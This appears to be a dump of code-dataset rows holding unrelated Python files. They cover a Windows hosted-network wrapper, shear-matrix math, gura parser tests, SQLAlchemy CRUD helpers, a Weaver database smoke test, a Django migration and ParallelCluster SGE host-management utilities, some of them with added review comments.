id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
5060341 | # Python wrapper for starting wireless access points on Windows
import time
import logging
import os, sys
from optparse import OptionParser
class AP():
    """Thin wrapper around the Windows `netsh wlan hostednetwork` commands.

    Holds the SSID and key taken from the parsed command-line options and
    starts/stops a hosted wireless access point.
    """
    def __init__(self, opts):
        # opts is an optparse Values object carrying SSID and KEY attributes.
        self.SSID = opts.SSID
        self.KEY = opts.KEY
    def start_AP(self):
        # Configure then start the hosted network.  Output of os.popen is
        # discarded, so failures are silent.
        # NOTE(review): SSID/KEY are interpolated unquoted into a shell
        # command; values containing spaces or shell metacharacters will
        # break the command (or worse) -- confirm inputs are restricted.
        os.popen("netsh wlan set hostednetwork mode=allow ssid={0} key={1}".format(self.SSID, self.KEY))
        os.popen("netsh wlan start hostednetwork")
    def stop_AP(self):
        # Tear the hosted network back down.
        os.popen("netsh wlan stop hostednetwork")
def main():
    """Parse command-line options, then start the AP and idle until Ctrl-C.

    NOTE(review): this is Python 2 code (`raw_input` and the `print`
    statement below); it will not run unmodified under Python 3.
    """
    # Setup the command line arguments.
    optp = OptionParser()
    # Output verbosity options
    optp.add_option('-q', '--quiet', help='set logging to ERROR',
                    action='store_const', dest='loglevel',
                    const=logging.ERROR, default=logging.INFO)
    optp.add_option('-d', '--debug', help='set logging to DEBUG',
                    action='store_const', dest='loglevel',
                    const=logging.DEBUG, default=logging.INFO)
    optp.add_option('-v', '--verbose', help='set logging to COMM',
                    action='store_const', dest='loglevel',
                    const=5, default=logging.INFO)
    # Option for ssid of access point to broadcast
    optp.add_option("-s", "--ssid", dest="SSID",
                    help="The SSID of access point")
    # Option for key to access point
    optp.add_option("-k", "--key", dest="KEY",
                    help="The key for the access point")
    opts, args = optp.parse_args()
    # Prompt interactively for anything not supplied on the command line.
    if opts.SSID is None:
        opts.SSID = raw_input("SSID for the access point being broadcast: ")
    if opts.KEY is None:
        # NOTE(review): "charcters" typo lives in a runtime prompt string;
        # left untouched here since this edit only changes documentation.
        opts.KEY = raw_input("Key for the access point being broadcast (8-63 charcters): ")
    # Setup logging.
    logging.basicConfig(level=opts.loglevel,
                        format='%(levelname)-8s %(message)s')
    # Main Event Execution: keep the AP up until the user interrupts, then
    # stop it cleanly.
    try:
        ap = AP(opts)
        ap.start_AP()
        while True:
            time.sleep(1)
    except (KeyboardInterrupt, EOFError) as e:
        ap.stop_AP()
        print "All done!"
        exit(0)
# Script entry point.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
8023841 | ''' Functions for working with shears
Terms used in function names:
* *mat* : array shape (3, 3) (3D non-homogenous coordinates)
* *aff* : affine array shape (4, 4) (3D homogenous coordinates)
* *striu* : shears encoded by vector giving triangular portion above diagonal
of NxN array (for ND transformation)
* *sadn* : shears encoded by angle scalar, direction vector, normal vector
(with optional point vector)
'''
import math
import warnings
import numpy as np
from .utils import normalized_vector, vector_norm
# Caching dictionary for common shear Ns, indices
_shearers = {}
for n in range(1,11):
x = (n**2 + n)/2.0
i = n+1
_shearers[x] = (i, np.triu(np.ones((i,i)), 1).astype(bool))
def striu2mat(striu):
''' Construct shear matrix from upper triangular vector
Parameters
----------
striu : array, shape (N,)
vector giving triangle above diagonal of shear matrix.
Returns
-------
SM : array, shape (N, N)
shear matrix
Examples
--------
>>> S = [0.1, 0.2, 0.3]
>>> striu2mat(S)
array([[1. , 0.1, 0.2],
[0. , 1. , 0.3],
[0. , 0. , 1. ]])
>>> striu2mat([1])
array([[1., 1.],
[0., 1.]])
>>> striu2mat([1, 2])
Traceback (most recent call last):
...
ValueError: 2 is a strange number of shear elements
Notes
-----
Shear lengths are triangular numbers.
See http://en.wikipedia.org/wiki/Triangular_number
'''
n = len(striu)
# cached case
if n in _shearers:
N, inds = _shearers[n]
else: # General case
N = ((-1+math.sqrt(8*n+1))/2.0)+1 # n+1 th root
if N != math.floor(N):
raise ValueError('%d is a strange number of shear elements' %
n)
N = int(N)
inds = np.triu(np.ones((N,N)), 1).astype(bool)
M = np.eye(N)
M[inds] = striu
return M
def sadn2mat(angle, direction, normal):
    """Matrix for shear by `angle` along `direction` vector on shear plane.

    The shear plane is defined by normal vector `normal`, and passes through
    the origin. The direction vector must be orthogonal to the plane's normal
    vector.

    A point P is transformed by the shear matrix into P" such that
    the vector P-P" is parallel to the direction vector and its extent is
    given by the angle of P-P'-P", where P' is the orthogonal projection
    of P onto the shear plane.

    Parameters
    ----------
    angle : scalar
       angle to shear, in radians
    direction : array-like, shape (3,)
       direction along which to shear
    normal : array-like, shape (3,)
       vector defining shear plane, where shear plane passes through
       origin

    Returns
    -------
    mat : array shape (3,3)
       shear matrix

    Examples
    --------
    >>> angle = (np.random.random() - 0.5) * 4*math.pi
    >>> direct = np.random.random(3) - 0.5
    >>> normal = np.cross(direct, np.random.random(3))
    >>> S = sadn2mat(angle, direct, normal)
    >>> np.allclose(1.0, np.linalg.det(S))
    True
    """
    # Reject direction/normal pairs that are not (numerically) orthogonal.
    if abs(np.dot(normal, direction)) > 1e-5:
        raise ValueError("direction, normal vectors not orthogonal")
    normal = normalized_vector(normal)
    direction = normalized_vector(direction)
    # The shear factor is tan(angle); `angle` is rebound to that factor.
    angle = math.tan(angle)
    M = np.eye(3)
    # Rank-1 update: points move along `direction` proportionally to their
    # signed distance from the plane with normal `normal`.
    M += angle * np.outer(direction, normal)
    return M
def sadn2aff(angle, direction, normal, point=None):
    """Affine for shear by `angle` along vector `direction` on shear plane.

    The shear plane is defined by a point and normal vector. The direction
    vector must be orthogonal to the plane's normal vector.

    A point P is transformed by the shear matrix into P" such that
    the vector P-P" is parallel to the direction vector and its extent is
    given by the angle of P-P'-P", where P' is the orthogonal projection
    of P onto the shear plane.

    Parameters
    ----------
    angle : scalar
       angle to shear, in radians
    direction : array-like, shape (3,)
       direction along which to shear
    normal : array-like, shape (3,)
       vector normal to shear-plane
    point : None or array-like, shape (3,), optional
       point, that, with `normal` defines shear plane.  Defaults to
       None, equivalent to shear-plane through origin.

    Returns
    -------
    aff : array shape (4,4)
       affine shearing matrix

    Examples
    --------
    >>> angle = (np.random.random() - 0.5) * 4*math.pi
    >>> direct = np.random.random(3) - 0.5
    >>> normal = np.cross(direct, np.random.random(3))
    >>> S = sadn2aff(angle, direct, normal)
    >>> np.allclose(1.0, np.linalg.det(S))
    True
    """
    # NOTE(review): unlike sadn2mat, this function does not check that
    # `direction` and `normal` are orthogonal -- confirm callers guarantee it.
    M = np.eye(4)
    normal = normalized_vector(normal)
    direction = normalized_vector(direction)
    # Shear factor is tan(angle).
    angle = math.tan(angle)
    # Linear part: identity plus rank-1 shear term (same form as sadn2mat).
    M[:3, :3] = np.eye(3) + angle * np.outer(direction, normal)
    if point is not None:
        # Translation shifts the shear plane so it passes through `point`.
        M[:3, 3] = -angle * np.dot(point, normal) * direction
    return M
def mat2sadn(mat):
    """Return shear angle, direction and plane normal from shear matrix.

    Parameters
    ----------
    mat : array-like, shape (3,3)
       shear matrix

    Returns
    -------
    angle : scalar
       angle to shear, in radians
    direction : array, shape (3,)
       direction along which to shear
    normal : array, shape (3,)
       vector defining shear plane, where shear plane passes through
       origin

    Examples
    --------
    >>> M = sadn2mat(0.5, [1, 0, 0], [0, 1, 0])
    >>> angle, direction, normal = mat2sadn(M)
    >>> angle, direction, normal
    (0.5, array([-1., 0., 0.]), array([ 0., -1., 0.]))
    >>> M_again = sadn2mat(angle, direction, normal)
    >>> np.allclose(M, M_again)
    True
    """
    mat = np.asarray(mat)
    # normal: cross independent eigenvectors corresponding to the eigenvalue 1
    l, V = np.linalg.eig(mat)
    # Indices of eigenvalues numerically equal to 1; the shear plane is the
    # eigenspace of eigenvalue 1, so at least two such vectors must exist.
    near_1, = np.nonzero(abs(np.real(l.squeeze()) - 1.0) < 1e-4)
    if near_1.size < 2:
        raise ValueError("no two linear independent eigenvectors found %s" %
                         l)
    V = np.real(V[:, near_1]).squeeze().T
    # Choose the eigenvector pair whose cross product has the largest norm
    # (i.e. the most independent pair); that cross product is the normal.
    lenorm = -1.0
    for i0, i1 in ((0, 1), (0, 2), (1, 2)):
        n = np.cross(V[i0], V[i1])
        l = vector_norm(n)  # NOTE: rebinds `l` (previously the eigenvalues)
        if l > lenorm:
            lenorm = l
            normal = n
    normal /= lenorm
    # direction and angle: (mat - I) maps everything onto the shear direction,
    # scaled by the shear factor; recover the angle via atan.
    direction = np.dot(mat - np.eye(3), normal)
    angle = vector_norm(direction)
    direction /= angle
    angle = math.atan(angle)
    return angle, direction, normal
def aff2sadn(aff):
    """Return shear angle, direction, plane normal and point from shear affine.

    Parameters
    ----------
    aff : array-like, shape (4,4)
       affine shear matrix

    Returns
    -------
    angle : scalar
       angle to shear, in radians
    direction : array, shape (3,)
       direction along which to shear
    normal : array, shape (3,)
       vector normal to shear plane
    point : array, shape (3,)
       point that, with `normal`, defines shear plane.

    Examples
    --------
    >>> A = sadn2aff(0.5, [1, 0, 0], [0, 1, 0])
    >>> angle, direction, normal, point = aff2sadn(A)
    >>> angle, direction, normal, point
    (0.5, array([-1., 0., 0.]), array([ 0., -1., 0.]), array([0., 0., 0.]))
    >>> A_again = sadn2aff(angle, direction, normal, point)
    >>> np.allclose(A, A_again)
    True
    """
    warnings.warn('This function can be numerically unstable; use with care')
    aff = np.asarray(aff)
    # Angle, direction and normal come from the 3x3 linear part.
    angle, direction, normal = mat2sadn(aff[:3,:3])
    # point: eigenvector corresponding to eigenvalue 1
    l, V = np.linalg.eig(aff)
    near_1, = np.nonzero(abs(np.real(l.squeeze()) - 1.0) < 1e-8)
    if near_1.size == 0:
        raise ValueError("no eigenvector corresponding to eigenvalue 1")
    # Any fixed point of the affine lies on the shear plane; take the last
    # candidate and de-homogenize it.
    point = np.real(V[:, near_1[-1]]).squeeze()
    point = point[:3] / point[3]
    return angle, direction, normal, point
| StarcoderdataPython |
12815866 | <filename>tests/full/test.py
from typing import Dict
from gura import ParseError
import unittest
import gura
import math
import os
class TestFullGura(unittest.TestCase):
    """End-to-end tests for the gura parser/serializer: loads/dumps round
    trips, NaN handling, empty documents and invalid keys."""

    # Directory of this test file; used to resolve tests-files/ paths.
    file_dir: str
    # NOTE(review): declared but never assigned on the instance; parsed data
    # is kept in local variables inside the tests -- possibly leftover.
    parsed_data: Dict

    def setUp(self):
        """Build the dict expected from parsing tests-files/full.ura."""
        self.file_dir = os.path.dirname(os.path.abspath(__file__))
        self.expected = {
            "a_string": "test string",
            "int1": +99,
            "int2": 42,
            "int3": 0,
            "int4": -17,
            "int5": 1000,
            "int6": 5349221,
            "int7": 5349221,
            "hex1": 3735928559,
            "hex2": 3735928559,
            "hex3": 3735928559,
            "oct1": 342391,
            "oct2": 493,
            "bin1": 214,
            "flt1": +1.0,
            "flt2": 3.1415,
            "flt3": -0.01,
            "flt4": 5e+22,
            "flt5": 1e06,
            "flt6": -2E-2,
            "flt7": 6.626e-34,
            "flt8": 224617.445991228,
            "sf1": math.inf,
            "sf2": math.inf,
            "sf3": -math.inf,
            "null": None,
            "empty_single": {},
            "bool1": True,
            "bool2": False,
            "1234": "1234",
            "services": {
                "nginx": {
                    "host": "127.0.0.1",
                    "port": 80
                },
                "apache": {
                    "virtual_host": "10.10.10.4",
                    "port": 81
                }
            },
            "integers": [1, 2, 3],
            "colors": ["red", "yellow", "green"],
            "nested_arrays_of_ints": [[1, 2], [3, 4, 5]],
            "nested_mixed_array": [[1, 2], ["a", "b", "c"]],
            "numbers": [0.1, 0.2, 0.5, 1, 2, 5],
            "tango_singers": [
                {
                    "user1": {
                        "name": "Carlos",
                        "surname": "Gardel",
                        "year_of_birth": 1890
                    }
                }, {
                    "user2": {
                        "name": "Aníbal",
                        "surname": "Troilo",
                        "year_of_birth": 1914
                    }
                }
            ],
            "integers2": [
                1, 2, 3
            ],
            "integers3": [
                1,
                2
            ],
            "my_server": {
                "host": "127.0.0.1",
                "empty_nested": {},
                "port": 8080,
                "native_auth": True
            },
            "gura_is_cool": "Gura is cool"
        }
        # Large enough that assertDictEqual always shows the full diff.
        self.maxDiff = 4096999

    def __get_file_parsed_data(self, file_name) -> Dict:
        """
        Gets the content of a specific file parsed
        :param file_name: File name to get the content
        :return: Parsed data
        """
        full_test_path = os.path.join(self.file_dir, f'tests-files/{file_name}')
        with open(full_test_path, 'r') as file:
            content = file.read()
        return gura.loads(content)

    def test_loads(self):
        """Tests all the common cases except NaNs"""
        parsed_data = self.__get_file_parsed_data('full.ura')
        self.assertDictEqual(parsed_data, self.expected)

    def test_loads_nan(self):
        """Tests NaNs cases as they are an exceptional case"""
        parsed_data = self.__get_file_parsed_data('nan.ura')
        for value in parsed_data.values():
            self.assertTrue(math.isnan(value))

    def test_dumps(self):
        """Tests dumps method"""
        parsed_data = self.__get_file_parsed_data('full.ura')
        string_data = gura.dumps(parsed_data)
        new_parsed_data = gura.loads(string_data)
        self.assertDictEqual(new_parsed_data, self.expected)

    def test_dumps_nan(self):
        """Tests dumps method with NaNs values"""
        parsed_data_nan = self.__get_file_parsed_data('nan.ura')
        string_data_nan = gura.dumps(parsed_data_nan)
        new_parsed_data_nan = gura.loads(string_data_nan)
        for value in new_parsed_data_nan.values():
            self.assertTrue(math.isnan(value))

    def test_empty(self):
        """Tests empty Gura documents"""
        parsed_data = gura.loads('')
        self.assertDictEqual(parsed_data, {})

    def test_empty_2(self):
        """Tests empty Gura documents, even when some data is defined"""
        parsed_data = gura.loads('$unused_var: 5')
        self.assertDictEqual(parsed_data, {})

    def test_invalid_key(self):
        """Tests invalid key"""
        with self.assertRaises(ParseError):
            gura.loads('with.dot: 5')

    def test_invalid_key_2(self):
        """Tests invalid key"""
        with self.assertRaises(ParseError):
            gura.loads('"with_quotes": 5')

    def test_invalid_key_3(self):
        """Tests invalid key"""
        with self.assertRaises(ParseError):
            gura.loads('with-dashes: 5')
if __name__ == '__main__':
    # Run the suite directly with the unittest runner.
    unittest.main()
| StarcoderdataPython |
6648743 | <filename>sql_app/crud.py
from sqlalchemy.orm import Session
from . import models, schemas
def db_commit(db: Session, db_model):
    """Add *db_model* to the session, commit, and refresh it from the DB.

    The refresh re-populates server-generated fields (e.g. autoincrement ids)
    on the instance after the commit.
    """
    db.add(db_model)
    db.commit()
    db.refresh(db_model)
def get_user(db: Session, user_id: str):
    """Return the User whose uid equals *user_id*, or None if absent."""
    uid_filter = models.User.uid == user_id
    return db.query(models.User).filter(uid_filter).first()
def get_users(db: Session, skip: int = 0, limit: int = 100):
    """Return a page of users: offset *skip*, at most *limit* rows."""
    query = db.query(models.User)
    return query.offset(skip).limit(limit).all()
def create_user(db: Session, user: schemas.UserCreate):
    """Persist a new User built from the *user* schema and return it."""
    new_user = models.User(uid=user.uid, name=user.name, picture=user.picture)
    db_commit(db, new_user)
    return new_user
def get_games(db: Session, skip: int = 0, limit: int = 100):
    """Return a page of games ordered by score then level, descending.

    NOTE(review): dead code -- this definition is shadowed by the later
    ``get_games(db, limit)`` further down in this module, so Python keeps only
    that binding.  Also, ``order_by`` is chained *after* ``offset``/``limit``
    and uses a raw SQL string, which modern SQLAlchemy rejects -- confirm
    intent before reviving (or delete) this version.
    """
    return db.query(models.Game).offset(skip).limit(limit).order_by("score desc, level desc").all()
def create_user_game(db: Session, game: schemas.GameCreate, user_id: str):
    """Persist a Game owned by *user_id*; raise Exception if the commit fails.

    Note: mutates the incoming *game* schema by setting its owner_id.
    """
    game.owner_id = user_id
    new_game = models.Game(**game.dict())
    try:
        db_commit(db, new_game)
    except Exception as exc:
        raise Exception('Game commit error', exc)
    return new_game
def get_games(db: Session, limit: int = 20):
    """Return the top *limit* games, ordered by level then score descending."""
    ordering = (models.Game.level.desc(), models.Game.score.desc())
    return db.query(models.Game).order_by(*ordering).limit(limit).all()
def get_user_games(db: Session, user_id: str, skip: int = 0, limit: int = 20):
    """Return a page of the games owned by *user_id*."""
    owned = db.query(models.Game).filter(models.Game.owner_id == user_id)
    return owned.offset(skip).limit(limit).all()
def get_user_game(db: Session, user_id: str, level: int = 1):
    """Return the game of *user_id* at *level*, or None if not found."""
    query = db.query(models.Game).filter(
        models.Game.owner_id == user_id,
        models.Game.level == level,
    )
    return query.first()
def get_user_style(db: Session, user_id: str):
    """Return the Style owned by *user_id*, or None if none exists."""
    owner_filter = models.Style.owner_id == user_id
    return db.query(models.Style).filter(owner_filter).first()
def create_user_style(db: Session, style: schemas.StyleCreate, user_id: str):
    """Persist a new Style owned by *user_id* and return it.

    Note: mutates the incoming *style* schema by setting its owner_id.

    Raises
    ------
    Exception
        ``Exception("create style error", <original error>)`` when the commit
        fails; the original exception is chained as the cause.
    """
    style.owner_id = user_id
    db_style = models.Style(**style.dict())
    try:
        db_commit(db, db_style)
    except Exception as e:
        # Include the underlying error (consistent with create_user_game) and
        # chain it so the full traceback is preserved for debugging.
        raise Exception("create style error", e) from e
    return db_style
| StarcoderdataPython |
1937 | <filename>tests/python/correctness/simple_test_aux_index.py
#! /usr/bin/env python
#
# ===============================================================
# Description: Sanity check for fresh install.
#
# Created: 2014-08-12 16:42:52
#
# Author: <NAME>, <EMAIL>
#
# Copyright (C) 2013, Cornell University, see the LICENSE file
# for licensing agreement
# ===============================================================
#
import sys
try:
import weaver.client as client
except ImportError:
import client
# End-to-end smoke test for a fresh Weaver graph-database install: builds a
# tiny social graph, runs traversals, and checks error paths and aliases.
# NOTE(review): Python 2 script (print statements at the bottom).
config_file=''
if len(sys.argv) > 1:
    config_file = sys.argv[1]

# create client object
c = client.Client('172.16.17.32', 2002, config_file)

# check aux index
assert c.aux_index()

# 1. create node for user ayush
c.begin_tx()
c.create_node('ayush')
c.set_node_properties({'type': 'user', 'age': '25'}, 'ayush')
c.end_tx()

# 2. create node for user egs
c.begin_tx()
c.create_node('egs')
c.set_node_property('type', 'user', 'egs')
c.end_tx()

# 3. ayush follows egs
c.begin_tx()
c.create_edge('ayush', 'egs', 'e1')
c.set_edge_property(edge='e1', key='type', value='follows')
c.create_edge('egs', 'ayush', 'e2')
c.set_edge_property(edge='e2', key='type', value='followed_by')
c.end_tx()

# 4. add a post and restrict visibility to followers only
c.begin_tx()
c.create_node('post')
c.set_node_property('type', 'post', 'post')
c.set_node_property('visibility', 'followers', 'post')
e3 = c.create_edge('egs', 'post')
c.set_edge_property(edge=e3, key='type', value='posted')
c.end_tx()

# 5. 'like' the post
c.begin_tx()
e4 = c.create_edge('post', 'ayush')
c.set_edge_property(edge=e4, key='type', value='liked_by')
c.end_tx()

# 6. list all the people who like egs's post
return_nodes = c.traverse('egs', {'type': 'user'}).out_edge({'type': 'posted'}).node({'type': 'post'}).out_edge({'type': 'liked_by'}).node({'type': 'user'}).execute()
assert len(return_nodes) == 1, 'traversal returned incorrect #nodes'
assert 'ayush' in return_nodes, 'traversal returned bad node handle'

# 7. try to create node with same handle as before
# (expected to fail: duplicate handles must be rejected at commit time)
c.begin_tx()
c.create_node('ayush')
try:
    c.end_tx()
    assert False, 'create node passed'
except client.WeaverError:
    pass

# 8. try to create edge with same handle as before
c.begin_tx()
c.create_edge('ayush', 'egs', 'e1')
try:
    c.end_tx()
    assert False, 'create edge passed'
except client.WeaverError:
    pass

# 9. add auxiliary handles to nodes
c.begin_tx()
c.add_alias('ad688', 'ayush')
c.add_alias('el33th4x0r', 'egs')
c.end_tx()

# 10. list all the people who like egs's post
# this time with aliases instead of handles
return_nodes = c.traverse('el33th4x0r', {'type': 'user'}).out_edge({'type': 'posted'}).node({'type': 'post'}).out_edge({'type': 'liked_by'}).node({'type': 'user'}).execute()
assert len(return_nodes) == 1, 'traversal returned incorrect #nodes'
assert 'ayush' in return_nodes, 'traversal returned bad node handle'

# 11. get node and check it is valid
ad = c.get_node('ayush')
assert 'ad688' in ad.aliases
assert 'type' in ad.properties
assert 'user' in ad.properties['type']
assert 'age' in ad.properties
assert '25' in ad.properties['age']
assert 'e1' in ad.out_edges

print 'Correctly executed 11 transactions of varying complexity, pass simple_test.'
print 'Success, you have a working Weaver setup!'
| StarcoderdataPython |
9642290 | __all__ = ('tag', 'reader', 'gui', 'exceptions')
| StarcoderdataPython |
384174 | from ._docstrings import setup_anndata_dsp
from ._track import track
# Public API re-exported by this utilities package.
__all__ = ["track", "setup_anndata_dsp"]
| StarcoderdataPython |
159145 | """
Implementation of DDPG - Deep Deterministic Policy Gradient
Algorithm and hyperparameter details can be found here:
http://arxiv.org/pdf/1509.02971v2.pdf
The algorithm is tested on the Pendulum-v0 OpenAI gym task
and developed with tflearn + Tensorflow
Author: <NAME>
"""
from .tf_ddpg_agent import TensorFlowDDPGAgent
| StarcoderdataPython |
8160772 | <reponame>jhkuang11/UniTrade
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-11-11 01:01
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import sorl.thumbnail.fields
class Migration(migrations.Migration):
    """Auto-generated initial migration (Django 1.11.10) creating the
    Category and Item models for the onlinestore app.  Edit with care:
    generated code is expected to match the migration history exactly."""

    initial = True

    dependencies = [
        # Depends on whichever model the project configures as AUTH_USER_MODEL.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, unique=True)),
                ('slug', models.SlugField(blank=True, unique=True)),
            ],
            options={
                'verbose_name_plural': 'Categories',
            },
        ),
        migrations.CreateModel(
            name='Item',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100)),
                ('price', models.DecimalField(decimal_places=2, max_digits=12)),
                ('description', models.TextField(blank=True, default='')),
                ('create_time', models.DateTimeField(auto_now=True)),
                ('image', sorl.thumbnail.fields.ImageField(upload_to='items')),
                ('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='items', to='onlinestore.Category')),
                ('seller', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['title'],
            },
        ),
    ]
| StarcoderdataPython |
8138154 | <reponame>jgleissner/aws-parallelcluster-node
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import re
from xml.etree import ElementTree
from common import sge
from common.remote_command_executor import RemoteCommandExecutor
from common.schedulers.converters import ComparableObject, from_xml_to_obj
from common.sge import check_sge_command_output, run_sge_command
# A qconf operation: the flag to pass to qconf, regexes that identify a
# successful per-host result line, and a human-readable description for logs.
QConfCommand = collections.namedtuple("QConfCommand", ["command_flags", "successful_messages", "description"])

QCONF_COMMANDS = {
    "ADD_ADMINISTRATIVE_HOST": QConfCommand(
        command_flags="-ah",
        successful_messages=[r".* added to administrative host list", r'adminhost ".*" already exists'],
        description="add administrative hosts",
    ),
    "ADD_SUBMIT_HOST": QConfCommand(
        command_flags="-as",
        successful_messages=[r".* added to submit host list", r'submithost ".*" already exists'],
        description="add submit hosts",
    ),
    "REMOVE_ADMINISTRATIVE_HOST": QConfCommand(
        command_flags="-dh",
        successful_messages=[
            r".* removed .* from administrative host list",
            r'denied: administrative host ".*" does not exist',
        ],
        description="remove administrative hosts",
    ),
    "REMOVE_SUBMIT_HOST": QConfCommand(
        command_flags="-ds",
        successful_messages=[r".* removed .* from submit host list", r'denied: submit host ".*" does not exist'],
        description="remove submission hosts",
    ),
    "REMOVE_EXECUTION_HOST": QConfCommand(
        command_flags="-de",
        successful_messages=[r".* removed .* from execution host list", r'denied: execution host ".*" does not exist'],
        description="remove execution hosts",
    ),
}

# The state of the queue - one of u(nknown), a(larm), A(larm), C(alendar suspended), s(uspended),
# S(ubordinate), d(isabled), D(isabled), E(rror), c(configuration ambiguous), o(rphaned), P(reempted),
# or some combination thereof.
# Refer to qstat man page for additional details.
# o(rphaned) is not considered as busy since we assume a node in orphaned state is not present in ASG anymore
SGE_BUSY_STATES = ["u", "C", "s", "D", "E", "P"]

# This state is set by nodewatcher when the node is locked and is being terminated.
SGE_DISABLED_STATE = "d"

# If an o(rphaned) state is displayed for a queue instance, it indicates that the queue instance is no longer demanded
# by the current cluster queue configuration or the host group configuration. The queue instance is kept because jobs
# which have not yet finished are still associated with it, and it will vanish from qstat output when these jobs
# have finished.
SGE_ORPHANED_STATE = "o"

# The states q(ueued)/w(aiting) and h(old) only appear for pending jobs. Pending, unheld jobs are displayed as qw.
# The h(old) state indicates that a job currently is not eligible for execution due to a hold state assigned to it
# via qhold(1), qalter(1) or the qsub(1) -h option, or that the job is waiting for completion of the jobs for which
# job dependencies have been assigned to it via the -hold_jid or -hold_jid_ad options of qsub(1) or qalter(1).
SGE_HOLD_STATE = "h"

# If the state is u, the corresponding sge_execd(8) cannot be contacted.
# An E(rror) state is displayed for a queue for various reasons such as failing to find executables or directories.
# If an o(rphaned) state is displayed for a queue instance, it indicates that the queue instance is no longer demanded
# by the current cluster queue configuration or the host group configuration. The queue instance is kept because jobs
# which have not yet finished are still associated with it, and it will vanish from qstat output when these jobs have
# finished.
SGE_ERROR_STATES = ["u", "E", "o"]
def exec_qconf_command(hosts, qhost_command):
    """Run one qconf operation (see QCONF_COMMANDS) against the given hosts.

    :param hosts: iterable of host objects exposing a ``hostname`` attribute
    :param qhost_command: QConfCommand with flags, success regexes, description
    :return: the subset of *hosts* for which the operation succeeded
        (empty list on any unexpected failure).
    """
    if not hosts:
        return []
    hostnames = ",".join([host.hostname for host in hosts])
    try:
        logging.info("Executing operation '%s' for hosts %s", qhost_command.description, hostnames)
        command = "qconf {flags} {hostnames}".format(flags=qhost_command.command_flags, hostnames=hostnames)
        # setting raise_on_error to False and evaluating command output to decide if the execution was successful
        output = check_sge_command_output(command, raise_on_error=False)
        succeeded_hosts = []
        # assuming output contains a message line for each node the command is executed for.
        # NOTE(review): zip() silently truncates if qconf emits a different
        # number of lines than hosts -- confirm this holds for all commands.
        for host, message in zip(hosts, output.split("\n")):
            if any(re.match(pattern, message) is not None for pattern in qhost_command.successful_messages):
                succeeded_hosts.append(host)
        return succeeded_hosts
    except Exception as e:
        # Best-effort semantics: log and report no host as succeeded.
        logging.error(
            "Unable to execute operation '%s' for hosts %s. Failed with exception %s",
            qhost_command.description,
            hostnames,
            e,
        )
        return []
def add_hosts_to_group(hosts):
    """Append each of *hosts* to the @allhosts SGE host group; returns the
    subset of hosts for which the command succeeded."""
    names = ",".join(host.hostname for host in hosts)
    logging.info("Adding %s to @allhosts group", names)
    template = "qconf -aattr hostgroup hostlist {hostname} @allhosts"
    return _run_sge_command_for_multiple_hosts(hosts, template)
def add_host_slots(hosts):
    """Register each host's slot count in the all.q queue; returns the subset
    of hosts for which the command succeeded."""
    names = ",".join(host.hostname for host in hosts)
    logging.info("Adding %s to all.q queue", names)
    template = 'qconf -aattr queue slots ["{hostname}={slots}"] all.q'
    return _run_sge_command_for_multiple_hosts(hosts, template)
def remove_hosts_from_group(hosts):
    """Remove each of *hosts* from the @allhosts SGE host group; returns the
    subset of hosts for which the command succeeded."""
    names = ",".join(host.hostname for host in hosts)
    logging.info("Removing %s from @allhosts group", names)
    template = "qconf -dattr hostgroup hostlist {hostname} @allhosts"
    return _run_sge_command_for_multiple_hosts(hosts, template)
def remove_hosts_from_queue(hosts):
    """Purge each of *hosts* from the all.q queue; returns the subset of
    hosts for which the command succeeded."""
    names = ",".join(host.hostname for host in hosts)
    logging.info("Removing %s from all.q queue", names)
    template = "qconf -purge queue '*' all.q@{hostname}"
    return _run_sge_command_for_multiple_hosts(hosts, template)
def install_sge_on_compute_nodes(hosts, cluster_user):
    """Start sge on compute nodes in parallel.

    Returns the subset of *hosts* whose remote command reported success.
    """
    command = (
        "sudo sh -c 'ps aux | grep [s]ge_execd || "
        "(cd {0} && {0}/inst_sge -noremote -x -auto /opt/parallelcluster/templates/sge/sge_inst.conf)'"
    ).format(sge.SGE_ROOT)
    hostnames = [host.hostname for host in hosts]
    result = RemoteCommandExecutor.run_remote_command_on_multiple_hosts(command, hostnames, cluster_user, timeout=20)
    # Keep only the hosts whose per-host result is present and truthy.
    return [host for host in hosts if result.get(host.hostname)]
def lock_host(hostname):
    """Disable the all.q queue instance on *hostname* (qmod -d), preventing
    new jobs from being scheduled there."""
    logging.info("Locking host %s", hostname)
    qmod_args = ["qmod", "-d", "all.q@{0}".format(hostname)]
    run_sge_command(qmod_args)
def unlock_host(hostname):
    """Re-enable the all.q queue instance on *hostname* (qmod -e)."""
    logging.info("Unlocking host %s", hostname)
    qmod_args = ["qmod", "-e", "all.q@{0}".format(hostname)]
    run_sge_command(qmod_args)
def _run_sge_command_for_multiple_hosts(hosts, command_template):
    """Sequentially run an sge command on the master node for the given hosts.

    :param hosts: iterable of host objects exposing ``hostname`` and ``slots``
    :param command_template: format string with ``{hostname}``/``{slots}``
        placeholders
    :return: the subset of *hosts* for which the command succeeded
    """
    succeeded_hosts = []
    for host in hosts:
        command = command_template.format(hostname=host.hostname, slots=host.slots)
        try:
            # Bug fix: the original called .format() a second time on the
            # already-formatted string -- a no-op at best, and it would raise
            # if a substituted value happened to contain braces.
            run_sge_command(command)
            succeeded_hosts.append(host)
        except Exception as e:
            logging.error("Failed when executing command %s with exception %s", command, e)
    return succeeded_hosts
def _run_qstat(full_format=False, hostname_filter=None, job_state_filter=None):
